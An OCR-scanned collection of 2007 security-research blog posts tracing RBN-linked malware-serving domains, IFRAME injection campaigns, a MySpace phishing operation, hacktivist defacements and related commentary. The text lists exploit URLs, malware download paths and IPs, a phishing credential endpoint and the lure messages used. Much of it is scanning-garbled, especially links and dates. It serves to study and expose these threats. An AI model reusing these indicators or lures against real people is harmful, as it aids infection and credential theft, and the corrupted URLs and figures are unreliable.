gotizon.net 

besttanya.com 

carsent.com 

heliosab.info 

gipperlox.info 

leader-invest.net 

fid erf ox. info 

potec.net 
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However, the latest IPs and domains related to the group are 
dispersed on different netblocks and are actively serving 
malware through exploit URLs : 

78.109.16.242/us3/index.php 

x-victory.ru/forum/index.php (85.255.114.170) 

asechka.cn/traff/out.php (78.109.18.154) 

trafika.info/stools/index.php (203.223.159.92) 

What's so special about this group? It's the [3]connection 
with the [4]Russian Business Network. As I've al¬ 
ready pointed out, the malware attack behind Possibility 
Media's [5]was using IPs rented on behalf of RBN customers 

from their old netblock, here are two such examples of RBN 
IPs used by this group as well : 

81.95.149.236/us3/index. php 

81.95.148.162/e202/ 

In case you also remember, some of [6]this group's URLs 
were also used as communication vehicle with a 

downloader that was hosted on a RBN IP, that very same 
RBN IP that was behind Bank of India's main IFRAME. 

Now that's a mutually beneficial malicious ecosystem for 
both sides. [7]Here are [8]more comments on other 

[9]ecosystems. 

1. http://ddanchev.blo as oot.com/2QQ7/lQ/possibilit v- 
medias-malware-fiasco.html 






2. http://ddanchev.blo as pot.com/2QQ7/lQ/portfolio-of- 
malware-embedded-ma a azines.html 


3. http://ddanchev.blo as pot.com/2QQ7/ll/detectin a -and- 
blockin a -russian-business.html 

4. http://ddanchev.blo as pot.com/2QQ7/lQ/russian-business- 
network.html 

5. http://ddanchev.blo as pot.com/2QQ7/lQ/over-lQQ- 
malwares-hosted-on-sm a le-rbn.html 

6. http://ddanchev.blo as pot.com/2QQ7/lQ/possibilit v- 
medias-malware-fiasco.html 

7. http://ddanchev.blo as pot.com/2QQ7/ll/lonel v- Polinas- 
secret.html 


8. http://ddanchev.blo as pot.com/2QQ7/ll/scamm v- 
ecosvstem.html 

9. http://ddanchev.blo as pot.com/2QQ7/Q2/phishin a- 
ecosvstem.html 
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Another Massive Embedded Malware Attack (2007- 
11-19 22:47) 

Compared to the previous [l]massive malware embedded 
attack in Italy that I asessed in June, 2007 which was 

primarily relying on the fact that a shared hosting provider 
got hacked into, this one is more interesting to follow 




































because the domains have nothing to do with each other, in 
fact some are suspected of being generated for blackhat 

SEO purposes in combination with embedded malware. The 
rest are legitimate sites. Moreover, the campaign 

is currently in a cover up stage, but the sites are still serving 
the IFRAME you can see in the attached screenshot. 

Currently affected sites where over 90 % still have the 
IFRAME within : 
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syncopatedvideo.com 

ja-bob.com 

idledrawings.com 

biblequizzer.net 

johnnydam.com 

gonaus.com 

caribbeanjamz.net 

campbellscollision.com 

instopiainsurance.com 

electronicesthetics.com 

blackopalproductions.com 

loadway.com 


mtwashingtonkennelclub.com 

shoveltown.com 

simplabase.com 

ajrivers.com 

jacquelinesdayspa.com 

epidemianet.com 

aabosa.net 

bisign.com 

orangevaleson.com 
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blackmanassociates.com 

jumarktrade.com 

queerduck.icebox.com 

The main campaign IFRAME URL is 

megazo.org/trans.htm serving TR/Crypt.XPACK.Gen and 
using its own name- 

servers nsl.megazo.org (203.117.111.102) and 
ns2.megazo.org (203.117.111.103) which is also hosting 

13fr.info; lsense.info; lspeed.info. 

Deobfuscation leads to lspice.info/t/ (203.121.79.164) 
where we're redirected to 



203.121.79.164/cgi-bin/new/in.cgi?p=user4, both URLs 
try to exploit [2]MDAC ActiveX code execution (CVE-2006- 

0003) vulnerability. Another exploit URL is also active at this 

IP - 203.121.79.164/web/index.php which is [3]lcepack 
is action. 

Related posts: 

[4] Bank of India Serving Malware 

[5] U.S Consulate in St.Petersburg Serving Malware 

[6] Syrian Embassy in London Serving Malware 

[7] CISRT Serving Malware 

[8] Compromised Sites Serving Malware and Spam 

[9] A Portfolio of Malware Embedded Magazines 

[10] Possibility Media's Malware Fiasco 
[ 11 ]I See Alive IFRAMEs Everywhere 

1. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-m-rtalv.html 

2. http://secunia.com/cve reference/CVE-2006-0003/ 

3. http://ddanchev.blo as pot.com/2007/Q7/icepack-malware- 
kit-in-action.html 

4. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

5. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
petersbur a -servin a .html 




















6. http://ddanchev.blo as pot.com/2QQ7/Q9/svrian-embass v- 
in-london-servin a .html 


7. http://ddanchev.blo as pot.com/20Q7/lQ/cisrt-servin a- 
malware.html 


8. http://ddanchev.blo as pot.com/2QQ7/lQ/compromised- 
sites-servin a -malware-and.html 

9. http://ddanchev.blo as pot.com/2QQ7/lQ/portfoliQ-of- 
malware-embedded-ma a azines.html 

10. http://ddanchev.blo as pot.com/2QQ7/lQ/possibilit v- 
medias-malware-fiasco.html 


11. http://ddanchev.blo as pot.com/2QQ7/ll/i-see-alive- 
iframes-evervwhere.html 
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Large Scale MySpace Phishing Attack (2007-11-20 
05:42) 

In need of a "creative phishing campaign of the year"? Try 
this, perhaps the largest phishing attack spoofing MySpace 
and collecting all the login details at a central location, 
that's been active for over a month and continues to be. A 
Chinese phishing group have come up with legitimate 
looking MySpace profiles (profile.myspace.com) in the form 

of subdomains at their original .cn domains, and by doing so 
achieve its ultimate objective - establish trust through 

typosquatting, remain beneath the security vendors radar 
by comment spamming the URLs inside MySpace, and 




























obtain the login details of everyone who got tricked. 

Key points : 

- all of the participating domains are using identical DNS 
servers, whereas their DNS records are set to change every 
3 

minutes 

- each and every domain is using a different comment spam 
message, making it easy to assess the potential impact of 

each of them 

- the URLs are not spammed like typical phishing emails, but 
comment spammed within MySpace by using legitimate 

accouts, presumably once that have already fallen victim 
into the campaign, and mostly to remain beneath the radar 

of security vendors if the URLs were spammed in the usual 
manner 

- all of the URLs are the subdomains are currently active, 
and the login details get forwarded to a central location 

319303.cn/login.php 
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This how the fake MySpace login looks like on the 
fake domains/subdomains : 

(form action = "http://319303.cn/login.php 11 method = 

"post" name = "theForm" id = "theForm) This is how the 

real MySpace login looks like : 



(form action = "http://secure.myspace.com/index.cfm? 
fuseaction=login.process" method = "post" id = 
"LoginForm") Sample MySpace phishing URLs from this 
campaign : 

profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn 

profile.myspace.com.index.fuseaction.id.370913.cn 

profile.myspace.com.fuseaction.id.0ed37i8xdd.125723.cn 

profile.myspace.com.fuseaction.id.Dx78x00iJe5.982728.cn 

profile.myspace.com.fuseaction.user.id.28902334.arutncbt.c 

n 

profile.myspace.com.fuseaction.id.0nd8di8xfd.125723.cn 

profile.myspace.com.fuseaction.id.0ed37i8xdd.109820.cn 

Ten sample Chinese domains participating in the 
phishing attack, returning the MySpace spoof at the 
main index 

and the subdomains : 

378d38.cn 

978bg33.cn 

370913.cn 

107882.cn 

103238.cn 


978nd03.cn 



107882.cn 


pcc2ekxz.cn 

125723.cn 

pckeez.cn 

Assessing the comment messages used on ten 
phishing domains for internal comment spamming at 
MySpace : 

370913.cn - 11 haha i cant believe we went to high school 
with this girt" 
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978bg33.cn-" sometimes i cannot believe the pics people 
put on their myspaces'' 

982728.cn - 11 / cannot believe this freaking whore would put 
pics like that on her my space page., how trashy.. " 

977y62.cn - 11 did you see what happened? OMG you gotta 
see Mike's profile. " 

125723.cn - 11 did you see what happened? OMG you gotta 
see Mike's profile. " 

pckeez.cn -" can you believe we went to highschool with 
this chick ?" 

pcc2ekxz.cn - 11 can't believe a 18 year old chick would put 
half-nude pics on myspace. whore alert. " 

arutncbt.cn -" wow her brother is gonna be so pissed when 
he sees the pictures she put on her myspace " 



125723.cn - 11 Did you hear what happened Omg you gotta 
see the profile.. So sad !" 

109820.cn - 11 sometimes i just cannot believe the pics that 
people put on their myspaces LMAO !" 

The campaign is surprisingly well thought of. If they were 
spamming the phishing URLs, security vendors would have 

picked it up immediately and its lifetime would have been 
much shorter compared to its current one. The phishers 

aren't sending emails asking people to login to MySpace via 
profile.myspace.com.random _digits.cn for instance, 

instead they're spamming inside MySpace by posting 
comments prompting users to click further using the phrase 

11 ha ha i cant believe we went to high school with this girl". 

It gets even more interesting, compared to the common 
logic of them having to register fake accounts and posting 
the comments by using them, in this case, the three sample 

comments posted on Nov 2 2007 11:22 AM; Nov 4 2007 
1:02 PM ; Nov 5 2007 8:47 AM; Nov 5 2007 9:33 PM, are all 

posted by legitime users, well from legitimate users' 
accounts in this case. How huge is this? Over 378,000 
results 

for the campaign under this phrase keeping in mind that 
people embed their MySpace profiles at their domains, and 

128,000 instances of a sample phishing domain 
(370913.cn) at MySpace.com itself. This is for one of the 
phishing 



domains only. 

Now if that's not enough to disturb you, each and every of 
the .cn domains are resolving to what looks like U.S based 

hosts only that will change every 3 minutes. Not necessarily 
[l]as dynamic as [2]previously discussed [3]fast-flux 

networks, but these are worth keeping an eye on : 

[4] 107882.cn 

[5] 370913.cn 

[6] 978bg33.cn 

Here are some central DNS servers that all the .cn 
domains use : 

ns4.6309a46.com 

nsl.52352a0c60a9c29.com 

ns3.926817a885d86el.com 

ns2.terimadisirida.net 

I'll leave the data mining based on these patterns to you, 
what's important is that the URLs are still serving spoofed 
MySpace front pages, with the only downsize that they 
cannot sucessfully load MySpace's videos, and don't provide 
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any SSL authentication, which I doubt have prevented lots 
of people from falling victims into it. 



Does all the data lead us to conclude that this could be the 
most "creative phishing campaign of the year"? 

Let's have it offline first. 

1. http://ddanchev.blo as pot.com/2QQ7/Q9/storm-worms-fast- 
f1ux-networks.html 

2. http://ddanchev.blo as pot.com/2QQ7/ll/mana a ed-fast- 
f1ux-provider.html 

3. http://ddanchev.blo as pot.com/2QQ7/lQ/fast-flux-spam- 
and-scams-increasin a .html 

4. 

http ://im a 218 jma a eshack.us/i m a 218/687 3/107882 cnbu 3 . p 
ng 

5. 

http://im a 218.ima a eshack.us/im a 218/764/37Q913cnda 6.pn 

9 

6 . 

http://im a 57.ima a eshack.us/im a 57/7429/978b a 33cnxll. pn 

g 
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Mass Defacement by Turkish Hacktivists (2007-11-21 
19:44) 

At first it appeared that it was just the [ 1 joffici a I site of 
Goa's DolP, that's been defaced by [2]Turkish defacers, but 
looking further the campaign gets much bigger than 
originally anticipated : 




























" The official website of the Goa government's Department 
of Information and Publicity (DolP) - goainforma- 

tion.org - was hacked by a group of Turkish militants on 
Saturday The hacker has not only defaced the website, 

replacing all information with the group's propaganda 
material in Turkish language, but also posted some gory 

pictures of slain terrorists. The DolP has now lodged a 
complaint with the Panjim Police and the Panjim crime 
branch is investigating the matter. " 

The campaign is aiming to [3]send a PSYOPS signal to the 
rest of the world regarding the recent tensions be¬ 
tween [4]Turkey's military operations in northern Iraq 
against PKK, an action the U.S doesn't seem to enjoy at 

all. Some sample defaced sites are savymedia.com; 
itrit.com; sledderforever.com; pssoc.org; 
youthblood.org; prisonministry.com. The defacers are 
sending the following message : 

" The United States of America who is feeding on and 
strengthening behind dosed doors the universal terror¬ 
ists, is the greatest terrorist country, pkk/kadek/hpg/kkk is 
the world's most bloody and brutal terrorism group. They 
killed approximately 35.000 innocent people without any 
cruel till now. All the nations and states must know which 
are supporting these bloody and brutal terrorism groups, 
supporting terrorism will brings suffer and deathness. We 
are always be a side of peace, but we have always some 
words to say these terrorists "which" wants to seperate us 
and kill innocent people 11 



Moreover, [5]Turkish hacktivists from another group have 
also been active recently by defacing the Assyrian 

Academic Society, Assyrian actress and author Rosie Malek- 
Yonan's site, and International Campaign to Support 

the Christians of Iraq petition's site. Three other Turkish 
hacktivists are also currently defacing under the handles 
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of NusreT, [6]MUSTAFAGAZI, and [7]Storm, using the same 
defacement templates. The first group is reachable at a 
closed forum turkmilliyetcileri.org, and the second at 
turkittifak.org. Apparently, these groups are all under the 
umbrella of the [8]Turkish Republican Hackers group. 

1. http://www.mumbaimirror.com/net/mm oa per.aspx? 
paa e=artEcle&sectEd = 2&contentid = 200711182007111802 

5237484ab3e7 
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2. http://ddanchev.blo as pot.com/2QQ7/ll/overperformin a- 
turkish-hacktivists.html 

3. http://ddanchev.blo as pot.com/2QQ6/Q9/internet- PSvops- 
ps vcholo a ical.html 

4. 

http://www.reuters.com/article/middleeastCrisis/idUSL2123Q 
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5. http://www.aina.or a /news/2QQ711192Q4422.htm 

6. http://www.loadtr.com/b-90967-h a azi. ipg 

7. http://www.loadtr.com/b-913Q6-stormindex. ipg 























8 . 

http://im a 73.ima a eshack.us/im a 73/2Q32/43433481me9. ipg 
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A Botnet of Infected Terrorists? (2007-11-21 22:33) 

Redefining malware to minimize the negative public 
outbreak by renaming it to Remote Forensic Software, now 
that's 

a evil marketing department's positioning strategy in 
action. I've already discussed how inpractical the [l]utopian 

central planning of a security industry is, and while you're 
limiting the access to the tools who may help someone 

unethically pen testing an internal asset, you're also 
limiting the possibility for the discovery of such vulnerable 
asset 

- basically a false feeling of security, you don't touch it, it 
doesn't move, until of course someone else outside your 
controlled environment comes across it, the way they will 
sooner or later since it's an open network, one you benefit 

from, but cannot fully control. 

[2]Australian law enforcement have been using spyware for 
a while, and Austria following [3]Germany's inter¬ 
est into the concept is getting [4]involved too: 

11 Germany is hiring software specialists to design "white- 
hat" viruses that could infiltrate terrorists' computers and 






help police detect upcoming attacks, an Interior Ministry 
spokeswoman in Berlin confirmed Saturday. The 

government is still drafting legislation to permit snooping 
via the internet under judicial control, but has decided there 
is no time to lose in developing the "remote forensic 
software." The ministry said the BKA federal police had 
been instructed to resume the development and hire two 
specialists. " 

[5]Are cyber criminals or bureaucrats the industry's top 
performer? In November, 2008, we'll be discussing 

how come so much money were spend to develop the 
malware, given the lack of any ROI out of this idea during 
the 

entire period, whereas DIY malware tools are not just a 
commodity, but also freely available for a law enforcement 

to use. Moreover, emailing malware is so old-fashioned and 
noise generating, that even the average Internet users 

knows "not to click on those email attachments sent from 
unknown source". A far more pragmatic approach would be 
to embedd the malware on sites suspected of evangelizing 
terrorism, or radicalizing their audiences, by doing 

so you'll end up with a larger infected sample, and 
eventually someone, let's say 1 out of 10,000 infected will 
turn 

out to be a terrorist, by whatever definition you're referring 
to in the case. Even more pragmatic, by [6]requesting a 
botnet on demand, and requiring the botnet master to tailor 
your purchase by providing you with infected hosts in 



Germany whose browser language, and default fonts used 
are Arabic, you will not just save money, but will increase 

the probability of coming across a stereotyped terrorist, by 
outsourcing the infecting stage to those who excell at it. 

Excluding the sarcasm, it's your money that go for funding 
of such initiatives who basically "shoot into the 

dark" to see if they can hit someone. Even if they manage to 
infect someone, more staff will be required to monitor the 
collected data, which means more money will go into this, 
ending up with an entire department monitoring 

wishful thinking and thought crime. [7]Geheime 
Staatspolizei anyone? 
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If you really want access to real-time early warning threat 
intell for possible threats, monitor the [8]public cyber 
jihadist communities don't come up with new ones to use 
them as [9]honeypots for cyber jihadists, identify local 

residents, [lOjevaluate their state of radicalization and 
attitudes towards standard terrorist ideas, prioritize, and 
take action if necessary. 

Cartoon courtesy of [ll]Mahjjob.com 

1. http://ddanchev.blo as pot.com/2QQ7/Q7/insecure- 
bureaucracv-in- a ermanv.html 


2. http://news.com.com/Australian-i-police-i- a et-i- ao- 
ahead+on+s p vware/2100-7348 3-5491671.html 













3. http://www.smh.com.au/news/World/Germanv-to-bu a- 
terrorists-computers/2 007/11/18/11953215 7 6891.html 

4. http://ddanchev.blo as pot.com/2007/Q9/infectin a -terronst- 
suspects-with.html 

5. http://ddanchev.blo as pot.com/2006/Q3/are-cvber- 
criminals-or-bureaucrats.html 

6. http://ddanchev.blo as pot.com/20Q7/10/botnet-on- 
demand-service.html 

7. http://en.wikipedia.or a /wiki/Gesta po 

8. http://ddanchev.blo as pot.com/2007/Q8/analvses-of-cvber- 
j ihadESt-forums-and.html 

9. http://ddanchev.blo as pot.com/2007/Q3/cvber-traps-for- 
wannabe- i ihadists.html 

10. http://ddanchev.blo as pot.com/20Q7/ll/cvber- i ihadist- 
blo a s-switchin a .html 

11. http://www.mah i oob.com/ 
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The State of Typosquatting - 2007 (2007-11-23 
16:10) 

The recently released M [l]What's In A Name: The State of 
Typo-Squatting 2007" is a very in-depth and well 
segmented study into the topic, you should consider going 
through : 


[2]lntroduction 









































[3] Typo- and Cyber-squatting on the rise 

[4] Key Findings 

[5] Methodology 

[6] Rankings by Category 

[7] Sample site: McAfee.com 

[8] The Economics of Typo-Squatting: Why it Works 

[9] What is driving the increase in typo-squatting 

[10] The decline in adult content on typo-squatters 

[11] Discussion of our methodology 

[12] Defining Typo-Squatting 

[13] 0ther Methods for Combating Typo-Squatting 

[14] Conclusions 

[15] Complete Results 

Is it just me using bookmarks and only risking to fall victim 
into a pharming attack, compared to manually typ- 
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ing and mistyping an URL? My point is that coming across 
several articles emphasizing how important typing the right 
URLs is, I think they've missed an important point which is 
that typosquatting by itself isn't that big of a security 
threat, but in a combination of tactics it becomes such. 
There's no chance you will ever mistype an URL such as 



paypal-comlwebscrc-login-run.com, a [16]typosquatted 
domain like the ones I covered in September, since these 

ones come in as phishing emails hosting a Rock Phish kit, 
namely they turn into threats when combined with other 

tactics. Blackhat SEO is another such tactic. The type of 
buy-cheap-iphones.com always aim to trick search engines 

into positioning them among the first 20 results, and they 
often succeed until a search engine figures out it's a 

blackhat SEO spam and removes it from the index. 

Here's an example of such combination of tactics, [17]use- 
iphone.com for instance was spammed according McAfee, 

the folks behind the study. What's was use-iphone.com all 
about? Icepack kit in action - use-iphone.com/ice- 

pack/index.php. 

1. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296 

2. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&cid = 382 96# introduction 

3. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#T v poCvberSauattin a 

4. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&cid = 38296#KevFindin as 

5. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Methodolo ay. 


























6. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Rankin gs 

7. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&dd = 38296#SampleSite 

8. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Economics 

9. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&dd = 38296#WhatlsDrivin a 

10. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Decline 

11. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&cid = 38296#Piscussion 

12. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Definin a 

13. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po&dd = 38296#OtherMethods 

14. http://us.mcafee.com/root/identitvtheft.as p? 
id=safe t v po&cid = 38296#Conclusions 

15. http://us.mcafee.com/root/identitvtheft.as p? 
id = safe t v po-full 

16. http://ddanchev.blo as pot.com/20Q7/Q9/ pav pal-and- 
eba v- phishin a -domains.html 

17. http://www.siteadvisor.com/sites/use- 
i phone.com/summar v/ 
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Exposing the Russian Business Network (2007-11-26 
11:52) 

It was about time someone comes up with an in-depth study 
summarizing all of the Russian Business Network's 

activities, as for me personally, 2007 is the year when 
bloggers demonstrated what wisdom of the crowds really 

means, by putting each and every piece of the puzzle to 
come up with the complete picture, one the whole world 

benefits from. A highly recommened account into the RBN's 
activities courtesy of David Bizeul's M [l]Russian Business 
Network study" : 

11 It's interesting to observe that many recent cyber crime 
troubles are relating to Russia. This observation is obviously 
a simple shortening. Indeed nothing seems to link to Russia 
at first sight, it's a nasty country for sending spam but 
many are worst, Russia is only the 8th top spam country. We 
need to dig deeper to identify that cyber 

crime is originating mostly from Russian dark zones. In a 
digital world, those dark zones exist where the Internet 
becomes invisible and it's used for collecting phishing sites 
credentials, for distributing drive by download exploits, for 
collecting malware stolen data, etc. It's a considerable black 
market as it has been revealed in this paper. A lot of 
information can be available over the web on Russian 
malicious activities and precisely on the way RBN (Russian 
Business Network) plays a major role in these cases. " 

What contributed to such a well coordinated exposure of the 
RBN during the last two quarters at the bottom 


line? It's not just security researchers exchanging info 
behind the curtains, but mostly due to RBN's customers 

confidence in RBN's ability to remain online. And while 
remaining online has never been a problem for the RBN, 
until 

recently when DIY IP blocking rulesets were available for the 
world to use, they undermined their abilities to remain 

undetected. In fact, I was about start a contest asking 
anyone who can come up with a IP with a clean reputation 

within the RBN's main netblock right before it dissapeared, 
and would have been suprised if someone managed to 

find one. 

The RBN doesn't just makes mistakes when its customers 
embedd malware hosting and live exploit URLs on 

each and every malware and high-profile attack during the 
year, it simply doesn't care in covering its tracks and 
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so doesn't their customers as well. RBN's second biggest 
mistake for receiving so much attention is their laziness 
which comes in the form of over 100 pieces of malware 
hosted on a single IP, without actually bothering to 

take care of their directory listing permissions, allowing my 
neatly crafred OSINT gathering techniques to come 


up with yet proof of a common belief into their practice of 
laziness. Moreover, the KISS strategy that I often 



relate to the successful malicious economies of scale that 
malware authors achieve due to DIY malware kits using 

outdated exploits compared to bothering to purchase zero 
day ones, didn't work for the RBN. Remember that 

each and every of the several Storm Worm related IPs that I 
covered once were returning fake suspended account 

notices in a typical KISS strategy, while the live exploit URLs 
and the actual binaries were still active within the domains. 

This isn't exactly what you would expect from what's 
turning into a case study on conversational marketing, 

or perhaps how conversational marketing provokes the 
wisdom of crowds effect to materialize, so that the entire 

community benefits from each and everyone's contribution - 
in this case exposing the RBN. 

How would the RBN change its practices in the upcoming 
future given all the publicity it received as of re¬ 
cently? They will simply stop benefing from the easy of 
management of their old centralized infrastructure, and will 

segment the network into smaller pieces, but while still 
providing services to their old customers, they're easy to 

traceback, and to sum up this post in one sentence - the 
Russian Business Network is alive, and is providing the same 

services to the same customers, including malware and live 
exploits hosting URLs under several different netblocks. 

It's also great to note that David's been keeping track of my 
research into the RBN's activities. [2]Go through 



the study and find out more about the RBN practices. 

Related posts: 

[3] Go to Sleep, Go to Sleep my Little RBN 

[4] Detecting and Blocking the Russian Business Network 

[5] RBN's Fake Security Software 

[6] Over 100 Malwares Hosted on a Single RBN IP 

[7] The Russian Business Network 

1. http://bizeul.or g /files/RBN_stud v.pdf 

2. http://bizeul.or g /files/RBN_stud v.pdf 

3. http://ddanchev.blo QS POt.com/2007/ll/ g o-to-slee p-Q O-to- 
sleep-mv-little-rbn.html 

4. http://ddanchev.blo QS POt.com/2007/ll/detectin g -and- 
blockin g -russian-business.html 

5. http://ddanchev.blo gs pot.com/20Q7/10/rbns-fake- 
securitv-software.html 

6. http://ddanchev.blo QS POt.com/2007/10/over-100- 
malwares-hosted-on-sin g le-rbn.html 

7. http://ddanchev.blo gs pot.com/20Q7/10/russian-business- 
network.html 
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But Malware is Prone to be Profitable (2007-11-26 
19:33) 





























Read this [l]a couple of times, than read it several more 
times, and repeat. It's usually "powerful stuff" that prompts 
such confusing descriptions of what sound like defense in- 
depth at one point, and a combination of intergalactic 

security statements in respect to the "massive amounts of 
computing power required" to solve the "security problem" 
at another. Stop predicting weather and assessing the 
impact of global warming, and [2]command the 

supercomputers to figure our the scientific mysteries behind 
common insecurities : 

" Even if we can't produce effective network security, we 
can at least make it more difficult and therefore expensive 
to attack a network by adopting some of the hacker's own 
techniques. He favors randomizing the use of 

a number of techniques for filtering content, so that 
individual malware vectors will sporadically stop working. 

By changing the challenge involved in compromising 
systems, the whole malware economy is changed. Stolfo 
also 

took a positively Darwinian view of how much change was 
needed, suggesting that security only had to be good 

enough to make someone else's system look like a more 
economical target. Overall, the talks were pretty 
depressing, 642 

given that the operating systems and software we rely on 
will probably never be truly secure. The process of blocking 
malware that takes advantage of this insecurity appears to 
be entering the realm where true security has 



become one of those problems that requires massive 
amounts of computing power and an inordinate amount of 
time . " 

The operating systems and the software we use can be truly 
secure, [3]but will be useless compared to the 

currently insecure, but useful ones we're using. Now here's a 
[4]great and straight to the point article, that's 

segmenting the possible uses of a host that's already been 
compromised, a great example of how innovations in 

terms of improved Internet connectivity, increased CPU 
power, and flexibility of online payments both steamline 

progress, and contribute to the growth of the underground. 

Beat malware by doing what malware authors do? Sounds 
great. Malware authors outsource, do it too. Mal¬ 
ware authors embraced the on demand SCM concept, 
embrace it too. Malware authors consolidate with stronger 

strategic partners, and acquire the weaker ones by 
providing them with DIY malware creation tools in order for 

them to make the headlines at a later stage, consolidate too. 
Malware authors keep it simple the stupids, you 

fight back with rocket science theoretical models and shift 
the focus from the pragmatic reality just the way it is - 

consolidation, outsourcing, shift towards a service based 
economy, quality and assurance of the malware releases, 

malicious economies of scale in the form of malware 
exploitating kits, ones it's getting hard to keep track of 



these days. 

At the bottom line, how to solve the "malware problem"? It 
all depends on who you're solving it for. Long 

live marginal thinking. 

Related posts: 

[5] Malware - Future Trends, January, 2006 

[6] Underground Economy's Supply of Goods and Services 

[7] The Dynamics of the Malware Industry - Proprietary 
Malware Tools 

[8] Managed Spamming Appliance - The Future of Spam 

[9] MuItiple Firewalls Bypassing Verification on Demand 

1. http://arstechnica.com/news.ars/post/20071120-makin a- 
malware-unprofitable-economics-kev-to-slowin a -hacker 

s-down.html 

2. http://www.top500.or a/ 

3. 

http://dilbert.com/comics/dilbert/archive/ima a es/dilbert200 

7113333116. gif 

4. http://www.dshield.or a /diarv.html?date=2007-11-20 

5. 

http://www.windowsecuritv.com/uplarticle/networksecurit v/ 

malware-trends.pdf 





















6. http://ddanchev.blo as DOt.com/20Q7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 


7. http://ddanchev.blo as pot.com/2007/10/dvnamics-of- 
malware-industrv.html 

8. http://ddanchev.blo as pot.com/20Q7/10/mana a ed- 
s pammin a-ap pliances-future-Qf.html 

9. http://ddanchev.blo as pot.com/20Q7/10/multiple-firewalls- 
bv passin a .html 
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I See Alive IFRAMEs Everywhere - Part Two (2007-11- 
27 22:40) 

The never ending IFRAME-ing of relatively popular or niche 
domains whose popularity is attracting loyal and well 

segmented audience, never ends. Which leads us to part 
two of this series [l]uncovering such domains and tracing 

back the malicious campaign to the very end of it. Some of 
these are still IFRAME-ed, others cleaned the IFRAMEs 

despite Google's warning indicating they're still harmful, the 
point is that all of these are connected. 

Affected sites : 

Epilepsie France - epilepsie-france.org 
Iran Art News - iranartnews.com 

The Media Women Forum - yfmf.org 
























Le Bowling en France - bowling-france.fr 

The Hong Kong Physiotherapists Union - hkpu.org 

The Wireless LAN Community - wlan.org 

The First HELLENIC Linux Distribution - zeuslinux.gr 

The entire campaign is orbiting around pornopervoi.com, 
which was last responding to 81.177.3.225, an IP 

that's also known to be hosting a fake bank (weiterweg- 
intl.com) according to [2]Artists Against 419. Within 

the domain, there were small files loading a second IFRAME. 
For instance, pornopervoi.com/u.php leads 

to 88.255.94.246/freehost 1/georg/index.php?id=0290 

(WebAttacker), the same campaign is also active at 

81.29.241.238/f reehost 1/georg/index. php?id=0290, 

these try to drop the following : 

88.255.94.246/f reehost l/chris0039/lu/dm _0039.exe 

81.29.241.238/f reehost l/chris0031/lu/dm _0031.exe 

An [3]Apophis C &C panel was located in this ecosystem as 
well. Among the other files at pornopervoi.com, 

are pornopervoi.com/i.php where we're redirected to the 
second one spelredeadread.com/in.php?adv=678. 
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Even more interesting, energy.org.ru a Web hosting 
provider is also embedded with pornopervoi.com/m.php 
again forwarding to spelredeadread.com. To further 



expand this ecosystem, yfmf.org the Media Women Forum 

is also IFRAME-ed with a link pointing to 

pornopervoi.com/m.php. Another site that's also pointing 

to pornopervoi.com/m.php is the Hong Kong 
Physiotherapists Union hkpu.org. Two more sites serving 
malware, namely wlan.org, the Wireless LAN Community 
also pointing to pornopervoi.com/m.php, and 
zeuslinux.gr, The First HELLENIC Linux Distribution. 

Who's behind this malware embedded attack? It's the 
ongoing consolidation between defacers, malware au¬ 
thors, and blackhat SEO-ers using the [4]infamous 
infrastructure of the RBN. 

Related posts: 

[5] Bank of India Serving Malware 

[6] U.S Consulate in St.Petersburg Serving Malware 

[7] Syrian Embassy in London Serving Malware 

[8] CISRT Serving Malware 

[9] Compromised Sites Serving Malware and Spam 

[10] A Portfolio of Malware Embedded Magazines 

[11] PossibiIity Media's Malware Fiasco 

[12] The "New Media" Malware Gang 

[13] Another Massive Embedded Malware Attack 

1. http://ddanchev.blo as oot.com/20Q7/ll/i-see-alive- 
iframes-evervwhere.html 






2. http://db.aa419.or g /fakebanksview. Dh p?kev=21091 


3. http://pandalabs.pandasecuritv.com/archive/Has-vour- 
credit-card-been-stolen 3FQQ as ox 

4. http://ddanchev.blo as pot.com/20Q7/ll/exposin a -russian- 
business-network.html 

5. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

6. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
petersbur a -servin g .html 

7. http://ddanchev.blo as pot.com/2007/Q9/svrian-embass v- 
in-london-servin a .html 

8. http://ddanchev.blo as pot.com/20Q7/10/cisrt-servin a- 
malware.html 

9. http://ddanchev.blo as pot.com/20Q7/10/compromised- 
sites-servin a -malware-and.html 

10. http://ddanchev.blo as pot.com/2007/10/portfono-of- 
malware-embedded-ma a azines.html 

11. http://ddanchev.blo as pot.com/20Q7/10/possibillit v- 
medias-malware-fiasco.html 


12. http://ddanchev.blo as pot.com/20Q7/ll/new-media- 
malware- a an a .html 

13. http://ddanchev.blo as pot.com/20Q7/ll/another- 
massive-embedded-malware-attack.html 
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Are You Botnet-ing With Me? (2007-11-27 22:48) 

Informative and [l]recently released study by ENISA on the 
problem of botnets, especially the emphasis on how 

[2]client side vulnerabilities surpassed email attachments, 
and downloading of infected files as [3]infection vectors. 

Not because these aren't working, but because of the 
botnet's masters attitude for achieving malicious economies 

of scale has changed. Despite that we can question whether 
or not they put so much efforts while strategizing this, 

let's say they stopped pushing malware, and started coming 
up with ways for the end users to pull it for themselves : 

" The most common infection methods are browser exploits 
(65 %), email attachments (13 %,) operating sys¬ 
tem exploits (11 %), and downloaded Internet files (9 %). 
Currently, the most dangerous infection method is surfing to 
an infected webpage. Indications of a bot on your computer 
